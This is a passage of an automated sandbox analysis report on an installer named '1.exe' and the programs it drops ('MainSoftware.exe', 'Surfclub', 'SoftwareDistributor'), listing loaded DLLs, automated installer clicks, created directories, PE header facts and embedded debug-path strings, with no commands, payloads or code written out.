    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: icu.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dhcpcsvc.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winnsi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winhttp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: mswsock.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wshunix.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winrnr.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: fwpuclnt.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: rasadhlp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: nlaapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: napinsp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: pnrpnsp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wshbth.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: schannel.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: mskeyprotect.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ntasn1.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ncrypt.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ncryptsslp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: msasn1.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: cryptsp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: rsaenh.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: cryptbase.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: gpapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: uxtheme.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: propsys.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: edputil.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: urlmon.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: srvcli.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wintypes.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: appresolver.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: bcp47langs.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: slc.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: userenv.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: sppc.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: apphelp.dll
    Source: C:\Program Files (x86)\Main\Chop\Install.exeSection loaded: apphelp.dll
    Source: C:\Program Files (x86)\Main\Chop\Install.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
    Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
    Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\System32\curl.exeSection loaded: schannel.dll
    Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dll
    Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dll
    Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: apphelp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: icu.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: dhcpcsvc.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: winnsi.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: winhttp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: mswsock.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: wshunix.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: winrnr.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: fwpuclnt.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: rasadhlp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: nlaapi.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: wshbth.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: pnrpnsp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: napinsp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: schannel.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: mskeyprotect.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: ntasn1.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: ncrypt.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: ncryptsslp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: msasn1.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: cryptsp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: rsaenh.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: cryptbase.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: mswsock.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: schannel.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: ntmarta.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: mskeyprotect.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: ncrypt.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: ncryptsslp.dll
    Source: C:\Users\user\Desktop\1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\1.exeAutomated click: I accept the terms in the License Agreement
    Source: C:\Users\user\Desktop\1.exeAutomated click: Next >
    Source: C:\Users\user\Desktop\1.exeAutomated click: Next >
    Source: C:\Users\user\Desktop\1.exeAutomated click: Install
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Surfclub\Install.exeDirectory created: C:\Program Files\Surfclub\Surfclub.exe
    Source: C:\Program Files\Surfclub\Surfclub.exeDirectory created: C:\Program Files\Surfclub\uuid
    Source: C:\Program Files\Surfclub\Surfclub.exeDirectory created: C:\Program Files\Surfclub\domains
    Source: C:\Program Files\Surfclub\Surfclub.exeDirectory created: C:\Program Files\Surfclub\installation_config.json
    Source: 1.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: 1.exeStatic file information: File size 34350912 > 1048576
    Source: 1.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2c7e00
    Source: 1.exeStatic PE information: More than 200 imports for KERNEL32.dll
    Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: 1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: MainSoftware.exe, 00000009.00000002.2459866027.0000024A2D710000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Sockets.ni.pdb source: MainSoftware.exe, 00000009.00000002.2459347730.0000024A2D621000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459431055.0000024A2D661000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Json\Release\net8.0\System.Text.Json.pdb source: MainSoftware.exe, 00000009.00000002.2458563735.0000024A2D4C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458435026.0000024A2D42C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2499249216.0000021DED311000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdb source: MainSoftware.exe, 00000009.00000002.2458048833.0000024A2D391000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487209932.0000021DEA141000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458406613.0000024A2D411000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458284663.0000024A2D3F7000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256P?> source: MainSoftware.exe, 00000009.00000002.2456750245.0000024A2CF93000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456841490.0000024A2CFC1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: MainSoftware.exe, 00000009.00000002.2457056110.0000024A2D096000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457231097.0000024A2D161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486216479.0000021DE9F91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdb source: MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2F0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdb source: MainSoftware.exe, 00000009.00000002.2457056110.0000024A2D091000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486011190.0000021DE9EC1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Security.ni.pdb source: MainSoftware.exe, 00000009.00000002.2456889306.0000024A2CFF9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456992556.0000024A2D041000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2485790532.0000021DE9E29000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Principal.Windows.ni.pdb source: MainSoftware.exe, 00000009.00000002.2471636608.0000024A30491000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471927266.0000024A304B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488653015.0000021DEA2F1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: MainSoftware.exe, 00000009.00000002.2457944763.0000024A2D371000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458017065.0000024A2D381000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ObjectModel.ni.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3D4000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256t source: MainSoftware.exe, 00000009.00000002.2459714008.0000024A2D6D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459648718.0000024A2D6C2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487984945.0000021DEA262000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.Json.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458168635.0000024A2D3CA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458251640.0000024A2D3E1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: MainSoftware.exe, 00000009.00000002.2459307961.0000024A2D601000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5DD000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Installers Project\Generic\ConsoleApp1\obj\Release\net8.0\win-x64\ConsoleApp1.pdb source: MainSoftware.exe, 00000009.00000002.2453377610.0000020993E41000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453268537.0000020993E37000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: MainSoftware.exe, 00000009.00000002.2459749816.0000024A2D6ED000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459831114.0000024A2D701000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: MainSoftware.exe, 00000009.00000002.2453611805.0000020993ED3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453831581.00000209957C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482080339.0000021DE7E51000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Text.Json.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458563735.0000024A2D4C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458435026.0000024A2D42C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2499249216.0000021DED311000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Linq.ni.pdb source: MainSoftware.exe, 00000009.00000002.2453611805.0000020993ED3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453831581.00000209957C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482080339.0000021DE7E51000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457807688.0000024A2D342000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: MainSoftware.exe, 00000009.00000002.2456286438.0000024A2B351000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456196090.0000024A2B349000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2459117236.0000024A2D5C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459006147.0000024A2D5BC000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog/obj/Release/net8.0/Serilog.pdb source: MainSoftware.exe, 00000009.00000002.2453861770.00000209957FD000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453952929.0000020995831000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482321883.0000021DE7EC1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdbUGP source: 1.exe, 00000000.00000003.1702765989.0000000009BF5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886484951.00000000075B7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Collections.ni.pdb source: MainSoftware.exe, 00000009.00000002.2453520509.0000020993E71000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453570792.0000020993EA9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2455864746.0000024A2B198000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455976436.0000024A2B241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483529829.0000021DE8071000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.CoreLib.ni.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: MainSoftware.exe, 00000009.00000002.2457601992.0000024A2D271000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457473544.0000024A2D247000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: MainSoftware.exe, 00000009.00000002.2456147251.0000024A2B321000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2FB000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483635124.0000021DE812B000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483816012.0000021DE8151000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: MainSoftware.exe, 00000009.00000002.2452853423.0000020993BF1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457323456.0000024A2D22B000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2459866027.0000024A2D710000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Claims.ni.pdb source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2457056110.0000024A2D091000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486011190.0000021DE9EC1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2458048833.0000024A2D391000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487209932.0000021DEA141000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ObjectModel\Release\net8.0\System.ObjectModel.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3D4000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Ping.ni.pdb source: MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2F0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbn source: 1.exe, 00000000.00000003.1697942133.00000000099F0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdbSHA256S source: MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2F0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: MainSoftware.exe, 00000009.00000002.2472309573.0000024A3051C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472443393.0000024A30531000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdb source: MainSoftware.exe, 00000009.00000002.2455757141.0000024A2B141000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455687451.0000024A2B118000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: 1.exe, 1.exe, 00000000.00000000.1671191024.0000000000A19000.00000002.00000001.01000000.00000003.sdmp, 1.exe, 00000000.00000002.2583513984.0000000000A19000.00000002.00000001.01000000.00000003.sdmp, 1.exe, 00000004.00000002.2546889945.0000000000A19000.00000002.00000001.01000000.00000003.sdmp, 1.exe, 00000004.00000000.1876100284.0000000000A19000.00000002.00000001.01000000.00000003.sdmp
    Source: Binary string: System.Net.NameResolution.ni.pdb source: MainSoftware.exe, 00000009.00000002.2459749816.0000024A2D6ED000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459831114.0000024A2D701000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: MainSoftware.exe, 00000009.00000002.2456750245.0000024A2CF93000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456841490.0000024A2CFC1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdb source: MainSoftware.exe, 00000009.00000002.2459117236.0000024A2D5C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459006147.0000024A2D5BC000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Threading.ni.pdb source: MainSoftware.exe, 00000009.00000002.2452853423.0000020993BF1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457323456.0000024A2D22B000.00000002.00000001.00040000.0000000A.sdmp
